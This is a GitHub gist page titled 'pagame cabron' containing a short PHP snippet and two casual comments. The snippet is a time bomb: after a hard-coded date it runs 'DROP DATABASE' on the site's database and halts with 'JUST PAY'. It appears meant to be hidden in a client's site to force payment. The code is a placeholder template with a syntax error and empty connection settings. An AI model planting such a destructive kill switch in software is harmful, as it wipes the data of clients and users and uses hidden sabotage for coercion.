Last active
November 15, 2022 16:27
-
-
Save marcomarkkez/8713792 to your computer and use it in GitHub Desktop.
pagame cabron
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
//Si ya se pasó la fecha dropea la DB | |
if( time() > mktime(h,m,s,mes,dia, año)){ | |
$ip = ""; | |
$db = "" | |
$usr = ""; | |
$pwd = ""; | |
$sql = "DROP DATABASE " . $db; | |
$query = mysql_query($sql); | |
die("JUST PAY"); | |
} | |
?> |
Gracias, me sirvió para comparar fechas xD
LOL, antes usaba mis gists como snippets para mi y no existían privados, prometo poner códigos interesantes
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Gracias, me sirvió para comparar fechas xD